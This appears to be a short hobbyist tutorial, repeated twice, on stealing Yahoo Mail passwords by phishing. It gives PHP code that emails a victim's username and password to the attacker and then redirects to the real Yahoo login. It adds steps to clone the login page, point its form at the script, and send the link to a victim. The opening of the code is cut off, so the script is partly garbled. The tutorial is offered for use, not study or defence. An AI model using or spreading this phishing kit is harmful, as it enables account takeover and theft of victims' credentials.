Wanna hack yahoo mail?
Hihihi.. yes you can.. but you dont have to hack yahoo's server, the only thing you need is some sort of social engineering attack (some might called phishing).
Ok.. let's move on..
1. Create a php file, with the following code. Then upload it, on your favourite web hosting. But be sure that your hosting supports PHP.
youre_email@your_domain.com";
$dari=$login."@yahoo.com";
$mesej="Email :".$login."@yahoo.com , passwordnya :".$passwd;
$subjek = "DMangsa baru.. hihihih : ".$login."@yahoo.com";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= 'From:'.$dari;
$kirim=mail($dari, $subjek, $mesej, $headers);
if($kirim)
{ header("location:http://mail.yahoo.com");
}
else { header("location:login.htm");
}
?>
2. Download the yahoo mail login page. Change the action= to your newly php file.
3. Send a link to your victim.
4. Just hope that he/she logs in, and you'll get a email automatically with the victim's username and password
Hihihi.. yes you can.. but you dont have to hack yahoo's server, the only thing you need is some sort of social engineering attack (some might called phishing).
Ok.. let's move on..
1. Create a php file, with the following code. Then upload it, on your favourite web hosting. But be sure that your hosting supports PHP.
youre_email@your_domain.com";
$dari=$login."@yahoo.com";
$mesej="Email :".$login."@yahoo.com , passwordnya :".$passwd;
$subjek = "DMangsa baru.. hihihih : ".$login."@yahoo.com";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= 'From:'.$dari;
$kirim=mail($dari, $subjek, $mesej, $headers);
if($kirim)
{ header("location:http://mail.yahoo.com");
}
else { header("location:login.htm");
}
?>
2. Download the yahoo mail login page. Change the action= to your newly php file.
3. Send a link to your victim.
4. Just hope that he/she logs in, and you'll get a email automatically with the victim's username and password